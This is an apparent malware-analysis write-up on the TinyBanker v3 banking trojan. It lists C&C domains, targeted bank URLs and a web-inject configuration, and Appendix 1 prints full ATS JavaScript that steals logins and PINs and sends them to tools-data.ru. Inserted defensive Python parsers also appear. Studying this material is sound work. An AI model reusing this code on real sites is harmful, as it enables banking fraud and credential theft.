Hold me closer, TinyBanker…. Version 3

Executive Summary

On December 23, 2015, Trusteer published a blog post about a new TinyBanker (aka Tinba) variant, version 3, which has been observed primarily targeting banks in Asia, with the majority of the activity directed against Singapore (36 percent) and Indonesia (16 percent), among other countries in the region. Germany, the United States, the United Kingdom, and Poland were also targeted, but to a lesser extent. [1] TinyBanker v. 3 uses a dedicated configuration for each region that it targets, a noteworthy evolution from previous versions. This blog’s technical analysis focuses on one sample harvested from VirusTotal.

TinyBanker v. 3

The sample we analyzed (MD5 eb6721568dc18c734e0af12a3094b9fa) was first uploaded to VirusTotal on September 23, 2015. One sinkholed command & control (C&C) domain revealed that on December 29, 2015, 11,280 active infections were present, indicating a moderately sized botnet.

Graph 1: December 29, 2015 Active Infections of TinyBanker v. 3 Sample

Ninety percent of the infections were located in Indonesia, followed by five percent in Germany and one percent each in Israel and Thailand.

Graph 2: Geographic Distribution of 12/29/2015 TinyBanker v. 3 Sample

The infections visualized on a map:

Figure 1: Geographic Distribution of 12/29/2015 TinyBanker v. 3 Sample

TinyBanker – A Brief History

TinyBanker was first discovered on May 31, 2012 by the Danish security firm CSIS. On July 10, 2014, the TinyBanker v. 1 source code leaked onto the Internet and was subsequently used by different actors, who have reworked and improved the original code to support their own operations. Since September 2014, several campaigns have leveraged TinyBanker across the globe. TinyBanker is written in Assembly language and is historically known to store its files (executable, configuration, web-injects) in %AppData%\default.

Technical Analysis of the Sample

The sample with MD5 eb6721568dc18c734e0af12a3094b9fa and SHA1 4c88bcf961e961c1429f95292514655b9c13768b was analyzed in a VirtualBox VM running Windows 7.

It tried to access these command & control (C&C) domains in the following order:

The full URL it tries to access looks like this [2]:

http://jw61gd6328hdy3tep.cc/n0tru2t76hw2edqj/
http://rmkltyeukjnw.org/n0tru2t76hw2edqj/

A report by Sophos [4] lists more domains than observed during analysis. Details about the possible C&C domains:

  • bqbcnrooddug.ru
  • rmkltyeukjnw.ru
  • ggccwfvisfll.ru

Active C&C

The URL http://ggccwfvisfll.ru/n0tru2t76hw2edqj/ is still alive at the time of this analysis. The following URLs were found to be active:

http://ggccwfvisfll.ru/n0tru2t76hw2edqj/      200   OK
http://ggccwfvisfll.ru/n0tru2t76hw2edqj/data/   403   Forbidden
http://ggccwfvisfll.ru/n0tru2t76hw2edqj/index.php   200   OK

The /data/ directory was known to exist in the leaked source code version.

Other activity

The sample moved itself into the directory “C:\Users\[User Name]\AppData\Roaming\547998F2” (in general “%AppData%\[random number]”), similar to previous versions.

Its data files are stored in %AppData%\LocalLow\[random number].

A public key was extracted out of memory.

C&C Protocol

The C&C protocol is slightly different to the previous versions.

This is the format of a packet received:

Details of the possible C&C domains:

Domain                 IP                Name Server               Registrant
jw61gd6328hdy3tep.cc   148.81.111.114    sinkhole.cert.pl          Sinkhole by CERT-PL
rmkltyeukjnw.ru        -                 -                         Suspended, possible C&C
rmkltyeukjnw.su        54.201.30.58      ns-1241.awsdns-27.org     Sinkhole by US company
rmkltyeukjnw.org       82.165.37.127     ns2.torpig-sinkhole.org   Sinkhole by German company
rmkltyeukjnw.pk        -                 -                         Not registered
bqbcnrooddug.ru        -                 -                         Suspended, possible C&C
bqbcnrooddug.su        52.28.249.128     NS1.101DOMAIN.COM         Sinkhole by K&A
bqbcnrooddug.org       5.2.189.251       www.bqbcnrooddug.org      Sinkhole by EU company
bqbcnrooddug.pk        -                 -                         Not registered
ggccwfvisfll.ru        185.117.153.167   c.dnspod.com              Active C&C

The code can be found in memory by setting hooks on I/O functions such as recv() (for the communication with the C&C) and on the web browser's Internet I/O functions such as InternetReadFile in the Internet Explorer processes.

WebInjects and Targets

By setting a hook on the InternetReadFile function, stepping through manually, and scanning memory, the web-injects could be extracted live from an Internet Explorer process into which TinyBanker had been injected.

Below is the full list of target URLs. For a full listing of web-injects see Appendix 1.

set_url https://companynet.mbank.p* GP
set_url https://www.centrum24.p* GP
set_url https://m.companynet.mbank.p* GP
set_url https://www.corporates.commerz* GP
set_url https://www.commerz* GP
set_url https://kunden.commerz* GP
set_url https://cbportal.commerz* GP
set_url https://logon.online.anz* GP
set_url https://digitalbanking2.* GP
set_url https://velocity.* GP
set_url https://ibank.ocbcnisp.co* GP
set_url https://internet.ocbc.* GP
set_url https://sslsecure.maybank.com.s* GP
set_url https://www.maybank2e.co* GP
set_url https://logon.rhbbank.com.s* GP
set_url https://ibank.standardchartered.* GP
set_url https://s2b.* GP
set_url https://infinity.icicibank* GP
set_url https://cib.icicibank.* GP
set_url https://private.bank* GP
set_url https://www1.dbsvonline* GP
set_url https://internet-banking.dbs* GP
set_url https://betapib.uob.* GP
set_url https://??.bibplus.uobgroup.* GP
set_url https://uniservices2.uobgroup.* GP
set_url https://www.hsbc.* GP
set_url https://www2.secure.hsbcnet.* GP
set_url https://www.cimbclicks.com.sg* GP
set_url https://www.bizchannel.cimb.* GP
set_url https://www.onlinesbiglobal.* GP
set_url https://dbia.dnb.* GP
set_url https://www.sccb.* GP
set_url https://www.citibank.* GP
set_url https://www.citibusiness.citibank.* GP
set_url https://ib.bankmandiri.co.id/retail/common/menu.jsp GP
set_url https://ib.bri.co.i* GP
set_url https://ibank.klikbca.com/ GP
set_url https://ibank.klikbca.com/*.do GP
set_url https://ibank.klikbca.com/*.do?value* GP
set_url https://ibank.klikbca.com/*.htm GP
set_url https://ibank.klikbca.com/*.jsp GP
set_url https://ib.bankmandiri.co.id/retail/common/banner.jsp GP
set_url https://ib.bankmandiri.co.id/retail/*.do* GP
set_url https://mib.bankmandiri.co.id/sme/* GP
set_url https://vpn.tarumanagara.co* GP
set_url https://bnidirect.bni.co.i* GP
set_url https://bnidirectsme.bni.co.i* GP
set_url https://ibank.bni.co.id/corp/Auth* GP
set_url https://ibank.bni.co.id/corp/Finacl* GP
set_url https://ibank.bri.co.i* GP
set_url https://www.cimbclicks.co.* GP

Below is an example of a full web-inject. The blue highlighted part marks an external script downloaded and executed on the bank's website.

set_url https://www.corporates.commerz* GP
data_before
</title>
data_end
data_inject
<script id="myqwe1">
window.rem777bname = '547998F2';
window.rem777ddeell = function (a){document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
</script>
<script id="myqwe4" src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script id="myqwe2" src="https://tools-data.ru/de/comz_plv2.js"></script>
<script id="myqwe3">
delete $;delete jQuery;
window.rem777ddeell("myqwe1");window.rem777ddeell("myqwe2");window.rem777ddeell("myqwe4");window.rem777ddeell("myqwe3");
delete rem777bname;delete rem777ddeell;
</script>
data_end
data_after
data_end
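
For defenders who need to triage a recovered configuration, the parser below is an added example (it is not part of the original analysis or of the malware). It reads the set_url / data_before / data_inject / data_after / data_end layout shown above, lists the hosts that injected scripts load from, and checks a monitored URL against the target masks. The wildcard semantics ('*' as any run, '?' as any single character, whole-URL match) and all function names are assumptions; the flags field is kept uninterpreted.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the entry shown above (inline script bodies trimmed) plus
# one bare set_url line taken from the target list.
SAMPLE_CONFIG = """\
set_url https://www.corporates.commerz* GP
data_before
</title>
data_end
data_inject
<script id="myqwe1">
window.rem777bname = '547998F2';
</script>
<script id="myqwe4" src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script id="myqwe2" src="https://tools-data.ru/de/comz_plv2.js"></script>
data_end
data_after
data_end
set_url https://??.bibplus.uobgroup.* GP
"""

SECTIONS = ("data_before", "data_inject", "data_after")
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)


def parse_webinjects(text):
    """Parse set_url / data_* / data_end blocks into a list of dicts."""
    entries, current, section, buf = [], None, None, []
    for lineno, line in enumerate(text.splitlines(), 1):
        token = line.strip()
        if section is not None:          # inside a data_* block: keep lines verbatim
            if token == "data_end":
                current[section] = "\n".join(buf)
                section, buf = None, []
            else:
                buf.append(line)
        elif token.startswith("set_url "):
            fields = token.split()
            current = {"url_mask": fields[1],
                       "flags": fields[2] if len(fields) > 2 else "",
                       "data_before": "", "data_inject": "", "data_after": ""}
            entries.append(current)
        elif token in SECTIONS:
            if current is None:
                raise ValueError(f"line {lineno}: {token} before any set_url")
            section = token
        elif token:
            raise ValueError(f"line {lineno}: unexpected line {token!r}")
    if section is not None:
        raise ValueError(f"unterminated {section} block")
    return entries


def mask_to_regex(mask):
    """Assumed semantics: '*' = any run, '?' = any one character (this also
    covers a literal '?' in a query string); the mask must cover the whole URL."""
    body = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c)
                   for c in mask)
    return re.compile(body + r"\Z", re.I | re.S)


def matching_masks(url, entries):
    """Return every target mask in the configuration that covers this URL."""
    return [e["url_mask"] for e in entries
            if mask_to_regex(e["url_mask"]).match(url)]


def script_hosts(entry):
    """Hosts that <script src=...> tags in data_inject load from."""
    hosts = {urlsplit(src).hostname
             for src in SCRIPT_SRC.findall(entry["data_inject"])}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    for entry in parse_webinjects(SAMPLE_CONFIG):
        print(entry["url_mask"], entry["flags"], script_hosts(entry))
```

The host list still needs review by an analyst: the jQuery CDN in this sample is legitimate, while the second host serves the ATS script.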

The ATS (Automated Transfer System) server checks the Referer header of requests for the JavaScript files; the Referer therefore has to be set manually when downloading the script from https://tools-data.ru/de/comz_plv2.js.

Automated Transfer System (ATS) Server

The server has these URLs active:

https://tools-data.ru/index.html
https://tools-data.ru/index.php
https://tools-data.ru/phpmyadmin/
https://tools-data.ru/robots.txt

The robots.txt reveals that the server has the Vesta Hosting Control Panel installed.

# vestacp autogenerated robots.txt
User-agent: *
Crawl-delay: 10

The server tools-data.ru (185.117.153.167) is hosted in Moscow. The whois data reveals that the domain was registered on 1/5/2016.

For more information on the ATS script, see Appendix 2.

domain: TOOLS-DATA.RU
nserver: a.dnspod.com.
nserver: b.dnspod.com.
nserver: c.dnspod.com.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: ARDIS-RU
admin-contact: http://ardis.ru/whois/
created: 2016.01.05
paid-till: 2017.01.05
free-date: 2017.02.05
source: TCI

References

[1]   Trusteer/IBM: I’m Yelling Tinba! Trojan Sets Sights on Singapore Banks for Holiday Season
      https://securityintelligence.com/im-yelling-tinba-trojan-sets-sights-on-singapore-banks-for-holiday-season/

[2]   TinyBanker sample on VirusTotal, MD5 eb6721568dc18c734e0af12a3094b9fa, SHA1 4c88bcf961e961c1429f95292514655b9c13768b
      https://www.virustotal.com/en/file/f64a04708334dd760d2e7f466fade72ab658d7582ed10c1fccecfb4c684cd866/analysis/1447251734/

[3]   TinyBanker blacklist listing IP address observed as C&C in this variant
      http://osint.bambenekconsulting.com/feeds/tinba-iplist.txt
      Historical entry (no longer available) via Google Cache: http://webcache.googleusercontent.com/search?q=cache:7d3OoT0cCuwJ:osint.bambenekconsulting.com/feeds/tinba-iplist.txt+&cd=10&hl=en&ct=clnk&gl=us
      http://osint.bambenekconsulting.com/feeds/tinba-master.txt

[4]   Sophos: Troj/Tinba-CB
      https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Tinba-CB/detailed-analysis.aspx

[5]   https://otx.alienvault.com/indicator/domain/bqbcnrooddug.ru/

Appendix 1: Full Web-Injects

if(typeof adblockadblock === typeof undefined) {
window.adblockadblock=1;
var bldt98uu = (function(){
var mysetTimeout=window.setTimeout;
var mysetInterval=window.setInterval;
var myeval=window.eval; 
if(1==3){
window.setTimeout=function(){}
window.setInterval=function(){}
window.eval=function(){}
}
if(1==2){
var antifrod=true;
window.setTimeout=function(){if(antifrod)return 123;aa=mysetTimeout(arguments[0],arguments[1]);return aa;}
window.setInterval=function(){if(antifrod)return 123;aa=mysetInterval(arguments[0],arguments[1]);return aa;}
window.eval=function(){if(antifrod)return 123;aa=myeval(arguments[0]);return aa;}
}
 
var my7=jQuery.noConflict(true);
my7.fn.removeStyle = function(style) {var search = new RegExp(style + '[^;]+;?', 'g');return this.each(function(){my7(this).attr('style', function(i, style) {return style.replace(search, '');});});};
my7.fn.onEnterKey = function( ) { my7(this).keypress( function( event ) { var code = event.keyCode ? event.keyCode : event.which;if (code == 13) { return false;}} );};
 
var wwww="tools-data.ru";
var blokss="zzz";
var affid="plv2";
affid="commz999";
 
 
var home_link = "https://"+wwww+"/az/atsbmid";var gate_link = home_link+"/gate.php?obj=bldt98uu&q="+affid;var pkey = "Bc5rw12";
var waitdiv="<div><br/><br/><br/><br/><center> Harap tunggu&#8230; Karena pembaruan perangkat lunak saat ini, pengaturan akun Anda sedang berlangsung saat ini... Ini dapat memerlukan waktu sampai 5 menit. <br/>Perhatian! Jangan membuka ulang halaman tersebut dan jangan menekan tombol kembali! Ini dapat menyebabkan pemblokiran akun Anda! <br/><br/><br/><img id="zzz" src="https://"+wwww+"/indicator.gif"></img><br/><br/><center></div>";
var waitfkk="<table id="fkdiv" align="center" border="0" cellpadding="0" cellspacing="0" width="97%"> <tbody><tr> <td colspan="3" class="header" height="30"><div class="header" align="center">Verifikasi tambahan identitas<div class="catatantext2" align="left"> <div align="right"></div> </div> </div></td> </tr> <tr> <td height="10" width="55%"></td> <td width="5%"></td> <td width="40%"></td> </tr>     <tr> <td colspan="3"> <div class="text-bold" align="right">Masukkan e-mail Anda yang terdaftar di system Mandiri</div> </td> </tr> <tr> <td height="20"></td> <td><div align="center"></div></td> <td></td> </tr> <tr>    <td>     <div class="text-bold"> <div align="right">E-mail</div> </div>    </td>    <td><div align="center"><span class="text-bold">:</span></div></td>    <td><input id="fkmail" size="25" value="" type="text"></td> </tr> <tr> <td height="20"></td> <td></td> <td></td> </tr> <tr align="right" valign="middle"> <td colspan="3">           <div><input id="fksend" src="images/button-kirim.gif" alt="Enter to submit" border="0" height="20" type="image" width="136"></div>           </td> </tr> </tbody></table>";
var waitlok="<div><br/><br/><br/><br/><center> Kami bekerja pada pemutakhiran database, sehingga layanan ini sementara tidak tersedia. <br/>Kami akan mencoba untuk melanjutkan layanan sesegera mungkin. Silahkan coba lagi dalam beberapa jam.<br/><br/><center></div>";
 
var botid = "0";
try{ if(window.rem777bname) botid = window.rem777bname;}catch(e){}
var ifr_state = -1;
var browser_type="NN";
 
var dialog7=1;
var show_debug = false;
var dredea2a=false;
var lochref=location.href;
var replaz="";
 
var loginbtn=false;var ats_started="";var ifr_window=false;var onwrite_state=-1;var login="empty";var holder_name="empty";var transfer_from_account_nr="";var balances="";var tmp_val="empty";var tmp_val2="empty";
var max_sum=-9999999;var drop_name="";var drop_city="";var drop_country="";var iban="";var memo_text="";var transfered_amount=0;var msg_type="";var msg="";var return_type="";var page_content=[];
function urlEncode(b){function gethex(a){return"%"+f.charAt(a>>4)+f.charAt(a&0xF)}var c="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-_.~";var d="!*'();:@&=+$,/?%#[]";var e=c+d;var f="0123456789ABCDEFabcdef";b=b+"";var g="";if(!b||b.length==0){return""}for(var i=0;i<b.length;i++){var h=b.charAt(i);if(c.indexOf(h)!=-1){g=g+h}else{var j=b.charCodeAt(i);if(j<128){g=g+gethex(j)}if(j>127&&j<2048){g=g+gethex((j>>6)|0xC0);g=g+gethex((j&0x3F)|0x80)}if(j>2047&&j<65536){g=g+gethex((j>>12)|0xE0);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}if(j>65535){g=g+gethex((j>>18)|0xF0);g=g+gethex(((j>>12)&0x3F)|0x80);g=g+gethex(((j>>6)&0x3F)|0x80);g=g+gethex((j&0x3F)|0x80)}}}return g}
function returnTrue(a){return a==null||a==undefined||a=="null"||a=="undefined"||a=="empty"||a==""||a==" "||a.length<4?false:true}
function clearLog(){msg="";msg_type="";return_type="";page_content=[]}
function removealls(){}
function formatCurrency(a){a=a.toString().replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+" "+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
function addLog(a,b,c,d){var e=new Date;e="z_"+botid+" "+ats_started+" "+(e.getHours()<10?"0":"")+e.getHours()+":"+(e.getMinutes()<10?"0":"")+e.getMinutes()+":"+(e.getSeconds()<10?"0":"")+e.getSeconds();msg_type=msg_type.length==0?c:!/error|warning/.test(msg_type)?c:msg_type;if(/error|warning/.test(c)){var f=page_content.length;var g="rn<base href='"+a.location.href.substr(0,a.location.href.lastIndexOf("/")+1)+"'>";page_content[f]=[];page_content[f].content_link=a.location.href;page_content[f].content="<html>"+g+"rn"+document.documentElement.innerHTML+"</html>"}msg="["+e+"] "+c+": "+b+"() -> "+d+(msg.length==0?"":"<br>")+msg}
function formatCurrency2(a){a=a+"";a=a.replace(/$|,/g,"");if(isNaN(a)){a="0"}sign=a==(a=Math.abs(a));a=Math.floor(a*100+0.50000000001);cents=a%100;a=Math.floor(a/100).toString();if(cents<10){cents="0"+cents}for(var i=0;i<Math.floor((a.length-(1+i))/3);i++){a=a.substring(0,a.length-(4*i+3))+"."+a.substring(a.length-(4*i+3))}return(sign?"":"-")+a}
 
 
 
 
function getData(a,b){removealls();if(!returnTrue(login)&&!/variables|write_log|get_parsed_numbers|send_b64_data/i.test(a)){doLogout();return}var c=drop_name.length>0?"&transfer_from_account_nr="+urlEncode(transfer_from_account_nr)+"&drop_name="+urlEncode(drop_name)+"&iban="+urlEncode(iban)+"&memo_text="+urlEncode(memo_text)+"&transfered_amount="+urlEncode(transfered_amount+""):"";var d=msg.length>0?"&msg_type="+urlEncode(msg_type)+"&msg="+urlEncode(msg)+"&return_type="+urlEncode(return_type||"atsEnd"):"";var e=balances.length>0?"&balances="+urlEncode(balances):"";var f="&bt="+urlEncode(browser_type)+"&botid="+urlEncode(botid);balances="";clearLog();
window.bldt98uu={};window.bldt98uu.CallResponse=function(msg_type, msg, ssid){
delete bldt98uu;my7("script[src*=atsbmid]").remove();callResponse(msg_type, msg, ssid);
};
my7.getScript(a+d+e+c+f);//my7("script[src*=atsbmid]").remove();
}
 
function postPageContent(){removeContentGrabberDiv();var a=document.createElement("div");a.id="contentGrabberDiv";if(!show_debug){a.style.display="none"}document.body.appendChild(a);var b="";b+="<iframe id="contentGrabbeIframe" name="contentGrabbeIframe" onLoad="try{bldt98uu.OnLoadContentGrabberIframe()}catch(err){void(0)}"></iframe>";b+="<form method="POST" action=""+gate_link+"" id="contentGrabberForm" target="contentGrabbeIframe">";b+="<textarea name="action">write_log</textarea>";if(returnTrue(login)){b+="<text"+"area name="login">"+login+"</text"+"area>"}if(balances.length>0){b+="<text"+"area name="balances">"+balances+"</text"+"area>"}b+="<text"+"area name="msg_type">"+msg_type+"</text"+"area>";b+="<text"+"area name="msg">"+msg+"</text"+"area>";b+="<text"+"area name="return_type">"+(return_type||"atsEnd")+"</text"+"area>";b+="<text"+"area name="pkey">"+pkey+"</text"+"area>";b+="<text"+"area name="bt">"+browser_type+"</text"+"area>";for(var i in page_content){b+="<text"+"area name="content_link_"+i+"">"+page_content[i].content_link+"</text"+"area>";b+="<text"+"area name="content_"+i+"">"+page_content[i].content.replace(/textarea/ig,"Zextarea")+"</text"+"area>"}b+="</form>";a.innerHTML=b;var c=document.getElementById("contentGrabberForm");balances="";clearLog();c.submit();}
function removeContentGrabberDiv(){if(document.getElementById("contentGrabberDiv")){document.getElementById("contentGrabberDiv").parentNode.removeChild(document.getElementById("contentGrabberDiv"))}}
function getDropData(a){var b="&action=get_drop_data";var c=Number(new Date);getData(gate_link+b+"&login="+urlEncode(login)+"&max_sum="+a+"&pkey="+urlEncode(pkey)+"&ssid="+c,c)}
function transferExists(){var a="&action=transfer_exists";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function writeLog(){if(page_content.length>0){zz=1;if(return_type=="atsEnd")zz=2;if(return_type=="showing")zz=3;postPageContent();if(zz==29)atsEnd();if(zz==3)show99();}else{var a="&action=write_log";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}}
function writeVariables(a,b){onwrite_state=b;var c="&action=set_variables";for(var d in a){c+="&"+d+"="+urlEncode(a[d])}var e=Number(new Date);getData(gate_link+c+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+e,e)}
function readVariables(){var a="&action=get_variables";var b=Number(new Date);getData(gate_link+a+"&login="+urlEncode(login)+"&pkey="+urlEncode(pkey)+"&ssid="+b,b)}
function getcurr(a){return parseFloat(a.split(/,|./)[0].replace(/[^0-9--]/igm,""));}
 
function show99(){
my7("html").show();
}
 
function lokPage(){
my7("body").html(waitlok);show99();
addLog(document,"lokPage","info","lokPage");return_type="0";writeLog();
return;
}
 
function replacerCanStart(){lokPage();}
function submitToken(type){}
 
function atsEnd(){
addLog(document,"atsStart","info","end work");
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);
}
 
function setconfig(b){var d=b.split("^z^");drop_name=d[0];drop_city=d[1];drop_country=d[2];iban=d[3];memo_text=d[4];transfered_amount=parseInt(d[5]);transfer_from_account_nr=d[6];}
 
function replacerzzz(a){ }
 
var tmprv="";
function callResponse(a,b,c){
removealls();
if(b=="lokPage"){lokPage();}
if(b=="doLogout"){top.location.href="https://ib.bankmandiri.co.id/";}
if(a=="error"){return;}
else if(a=="set_variables"){onWriteVariables()}
else if(a=="get_variables"){
tmprv=b;
console.log(b);
var d=b.split("^^^");
login=d[0];
holder_name=d[1];
ats_started=d[2];
tmp_val=d[3];
tmp_val2=d[4];
if(d[5].length>9) {replaz=d[5];replacerzzz(replaz);return;}
//replacer_received=parseReplacerArray(d[5]);
if(!returnTrue(login)){
ats_started=="99";
addLog(document,"callResponse","logout","login is empty. redirecting to login page");return_type="doLogout";writeLog();return;
}
onReadVariables();
}
 
else if(a=="transfer_exists"){
var d=b.split("^^^");var e=d[0]=="YES"?true:false;var f=d[1];
if(e){addLog(document,"callResponse","failed","transfer already exists for "+f);return_type="atsEnd";writeLog();return}
addLog(document,"callResponse","info","no transfers for this account. requesting drop for "+max_sum);getDropData(max_sum)
}
else if(a=="get_drop_data"){
if(/^([EMPTY])$/.test(b)){
addLog(document,"callResponse","info","no drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
//addLog(document,"callResponse","failed","no drops in admin panel.");return_type="atsEnd";writeLog()
}
else if(/^([NOT_FOUND])$/.test(b)){addLog(document,"callResponse","failed","no suitable drops in admin panel.");
ats_started="2";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmp_val2},888);
}
else{
top.d0r0op=b;
setconfig(b);
addLog(document,"callResponse","info","Starting transfer to: '"+iban+"' amount "+transfered_amount);
ats_started="3";writeVariables({login:login,ats_started:ats_started},888);
}
}
else if(a=="write_log"){
if(b=="atsEnd"){atsEnd()}
if(b=="showing"){show99();}
if(b=="readVariables"){readVariables()}
}
}
 
function IsEmail(email) {var regex = /^([a-zA-Z0-9_.+-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/;return regex.test(email);}
function showmailfake(){
if(typeof window.mailok != typeof undefined) {delete mailok;submitimg(loginbtn);return;}
q1=my7(loginbtn).closest("table");
q1.after(waitfkk);
q1.hide();
my7("#fksend").click(function(){
var mailz=my7("#fkmail").val();
if(IsEmail(mailz)){
addLog(document,"saveLoginData","info","EMAIL:"+mailz);
ats_started="1";writeVariables({login:login,ats_started:ats_started,tmp_val:mailz},1);
} else {
addLog(document,"onLoaded","info"," mmssgg BADMAIL:"+mailz);return_type="0";writeLog();
alert("Anda masukkan e-mail yang salah");
}
return false;
});
}
 
 
function onWriteVariables(){
removealls();
if(onwrite_state==101){showmailfake();}
if(onwrite_state==1){submitimg(loginbtn);}
 
else if(onwrite_state==99){
top.dredea2a=true;
menuclick("https://ib.bankmandiri.co.id/retail/Welcome.do?action=result");
 
else if(onwrite_state==757){transferExists();}
else if(onwrite_state==371){window.refreshCityList();}
else if(onwrite_state==372){window.refreshBranchLocationList();}
else if(onwrite_state==373){transferExists();}
 
}
 
 
 
function onReadVariables(){
if(ats_started=="0"){
show99();
addLog(document,"atsStart","info","tmprv:"+tmprv);
ats_started="99";writeVariables({login:login,ats_started:ats_started},99);return;
}
 
if(ats_started=="99"){show99();return;}
 
 
if(ats_started=="1"){
q1=my7ajx("ol.breadcrumb li");
if(q1.size()==1) {holder_name=q1.text().replace(/^s*|s$|t|r|n/gim,"");}
 
q1=my7("div#Authorization");
if(q1.size()>0)
{
loginbtn=my7("a#REKENING");
if(loginbtn.size()!=1) {addLog(document,"onLoadIframe","error","error REKENING?");return_type="0";writeLog();show99();return;}
 
tmpx="";
tmpx=my7("span.bcum").text().replace(/^s*|s$|t|r|n/gim,"")+"||";
tmpx+=my7("div.pageheadingcaps h1").text().replace(/^s*|s$|t|r|n/gim,"")+"||";
q1=my7("div#DispForm");
if(q1.size()!=1){addLog(document,"onLoadIframe","error","error DispForm?");return_type="0";writeLog();show99();return;}
q1=q1.find("h2:has(span.simpletext), h3:has(span.simpletext), p.formrow:has(span.querytextleft):has(span.querytextright)");
q1.each(function(){
q2=my7(this);
if(q2.is("h3, h2")){tmpx+="hZZ"+q2.text()+"ZZ ||";return;}
w1=q2.find("span.querytextleft");
w2=q2.find("span.querytextright");
if(w2.find("a").size()>0){tmpx+="aZZ";}else{tmpx+="tZZ";}
tmpx+=w1.text()+"ZZ";
tmpx+=w2.text()+"||";
});
 
addLog(document,"onReadVariables","info","DETECT. go to REKENING");
ats_started="101";writeVariables({login:login,ats_started:ats_started,tmp_val2:tmpx},2);
return;
}
 
show99();
addLog(document,"onReadVariables","info","page:"+holder_name+" | "+document.title);
ats_started="1";writeVariables({login:login,ats_started:ats_started},298);
return;
}
 
 
else {
show99();
addLog(document,"onLoadIframe","error","lol??? "+ats_started+" "+lochref);return_type="0";writeLog();
}
 
}
 
var mon="not";
function onLoaded(){
lgf=my7("input#teilnehmer");
pss=my7("input#pin");
loginbtn=my7("button#headerLoginSubmit");
if(loginbtn.length>0 && lgf.length>0 && pss.length>0) {
var clicked=function(){
login=lgf.val();
addLog(document,"saveLoginData","info","ua:"+window.navigator.userAgent);
addLog(document,"saveLoginData","info","domain:"+document.location.host);
addLog(document,"saveLoginData","info","login MMSSGG details:"+login+"|||"+pss.val());
ats_started="1";writeVariables({login:login,ats_started:ats_started},101);
return false;
};
my7("form, input").onEnterKey();
show99();
loginbtn.click(function(){clicked();return false;});
return;
}
readVariables();return;
}
 
return{
   Run: function(){
   my7("html").hide();
my7(document).ready(function(){onLoaded();}); 
   },
   CallResponse: function(msg_type, msg, ssid){callResponse(msg_type, msg, ssid);},
   OnLoadIframe: function(a,b){onLoadIframe(a,b);},
   SubmitToken: function(type){submitToken(type);},
   addLog: function(a,b,c,d){addLog(a,b,c,d);},
   writeLog: function(){writeLog();},
   fake77: function(a,b){fake77(a,b);}
}
}());
 
 
if(bldt98uu.Run)bldt98uu.Run();
delete bldt98uu;
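
The script above reports to gate.php with a fixed parameter set (obj, q, action, login, pkey, ssid, bt, botid), so its traffic can be recognised by shape even when the host changes. The detector below is an added example for incident responders, not code from the original analysis: it assumes a TLS-inspecting proxy that logs '<timestamp> <client> <url>', and the log lines, client addresses and login value are constructed.

```python
from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# gate.php actions issued by the script in Appendix 1
GATE_ACTIONS = {"get_variables", "set_variables", "write_log",
                "transfer_exists", "get_drop_data"}
REQUIRED = {"obj", "action", "pkey", "ssid", "botid"}
CNC_PATH = "/n0tru2t76hw2edqj/"      # C&C path observed for this sample

# Constructed proxy log: hosts and parameter names come from the page,
# everything else (clients, login, timestamps) is invented for the example.
SAMPLE_LOG = """\
2016-01-12T03:10:00Z 10.0.4.23 http://ggccwfvisfll.ru/n0tru2t76hw2edqj/
2016-01-12T03:14:07Z 10.0.4.23 https://tools-data.ru/az/atsbmid/gate.php?obj=bldt98uu&q=commz999&action=set_variables&login=user01&ats_started=1&login=user01&pkey=Bc5rw12&ssid=1452568447000&msg_type=info&msg=%5Bz_547998F2%201%2003%3A14%3A07%5D%20info%3A%20saveLoginData%28%29%20-%3E%20domain%3Aexample.test&return_type=atsEnd&bt=NN&botid=547998F2
2016-01-12T03:15:30Z 10.0.4.23 https://tools-data.ru/az/atsbmid/gate.php?obj=bldt98uu&q=commz999&action=get_drop_data&login=user01&max_sum=-9999999&pkey=Bc5rw12&ssid=1452568530000&bt=NN&botid=547998F2
2016-01-12T03:16:00Z 10.0.4.77 https://payments.example.test/gate.php?action=pay&id=7
2016-01-12T03:17:00Z 10.0.4.77 https://www.example.test/index.html
"""


def ssid_time(ssid):
    """ssid is Number(new Date) in the script: victim clock, ms since epoch."""
    try:
        return datetime.fromtimestamp(int(ssid) / 1000, tz=timezone.utc).isoformat()
    except (ValueError, OverflowError, OSError):
        return None


def classify(url):
    """Return None for unrelated URLs, else a dict describing the hit."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.path.startswith(CNC_PATH):
        return {"kind": "cnc", "host": parts.hostname}
    if not parts.path.endswith("/gate.php"):
        return None
    query = {k: v[0] for k, v in
             parse_qs(parts.query, keep_blank_values=True).items()}
    if not REQUIRED.issubset(query) or query["action"] not in GATE_ACTIONS:
        return None                   # an unrelated gate.php lacks this shape
    return {"kind": "ats_gate", "host": parts.hostname,
            "action": query["action"], "botid": query["botid"],
            "campaign": query.get("q", ""),
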